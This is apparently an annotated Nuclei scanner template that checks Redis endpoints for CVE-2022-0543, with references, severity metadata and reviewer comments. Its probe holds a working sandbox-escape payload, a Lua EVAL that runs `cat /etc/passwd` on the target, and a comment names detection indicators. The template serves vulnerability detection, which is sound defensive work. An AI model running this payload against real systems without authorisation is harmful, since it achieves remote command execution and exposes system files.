# Nuclei network (tcp) template that checks a Redis endpoint for CVE-2022-0543.
# It is an active check: the probe sends a Lua EVAL whose script runs a shell
# command on the target and reports a match when the reply looks like
# /etc/passwd content.
id: CVE-2022-0543

info:
  name: Redis Sandbox Escape - Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: |
    This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries.
  reference:
    - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
    - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis
    - https://bugs.debian.org/1005787
    - https://www.debian.org/security/2022/dsa-5081
    - https://lists.debian.org/debian-security-announce/2022/msg00048.html
  # The remediation text names no version; the Debian advisory in the references
  # (DSA-5081) is the place to confirm which package versions carry the fix.
  remediation: Update to the most recent versions currently available.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2022-0543
    # The CPE names generic redis:redis with version "-", while the description
    # attributes the flaw to the Debian and Ubuntu packaging. For asset triage,
    # key on the distro package rather than on this CPE alone.
    cpe: cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:*
    # NOTE(review): presumably a point-in-time EPSS value; re-check before
    # using it for prioritisation.
    epss-score: 0.97184
  metadata:
    max-request: 1
    product: redis
    shodan-query: redis_version
    vendor: redis
  # "unauth": the probe sends no AUTH before EVAL, so an instance that demands
  # credentials will not match even if its package is unpatched.
  # NOTE(review): "kev" presumably marks the CISA Known Exploited
  # Vulnerabilities catalogue - confirm.
  tags: cve,cve2022,network,redis,unauth,rce,kev

tcp:
  # Each target is tried over plain TCP and over TLS.
  - host:
      - "{{Hostname}}"
      - "tls://{{Hostname}}"
    # Only 6380 is listed here; Redis's stock port is 6379.
    # NOTE(review): confirm how this value interacts with a port supplied in the
    # scan target, otherwise instances on other ports are silently not covered.
    port: 6380

    inputs:
      # A single EVAL command: the script uses package.loadlib to pull
      # luaopen_io from the system liblua5.1 shared object, then returns the
      # output of `cat /etc/passwd` obtained through io.popen.
      # Coverage caveat: the library path is hard-coded to
      # /usr/lib/x86_64-linux-gnu, so no match on a host with another
      # architecture or library layout does not show that the host is patched.
      # Detection: EVAL scripts that reference package.loadlib or io.popen are a
      # strong indicator of this technique in captured Redis traffic.
      - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n"
    # Read size is capped at 64, so the regex below is evaluated against the
    # beginning of the reply only.
    read-size: 64

    matchers:
      # A hit requires a "root" passwd entry with uid 0 and gid 0 in the data
      # read back, i.e. evidence that the command actually ran on the target.
      - type: regex
        regex:
          - "root:.*:0:0:"
# NOTE(review): the trailing digest looks like the template's signature; any
# edit to the content above (added comments included) presumably stops it from
# verifying, so re-sign before distributing a modified copy.
# digest: 4b0a00483046022100eb974862daaa61272dbf5a282701e7337028b4724c883be8673419b2dcd01b30022100bf7b73e76c9d0e70f83f27318027d477f084528a977168d364890ff6839e3c91:922c64590222798bb761d5b6d8e72950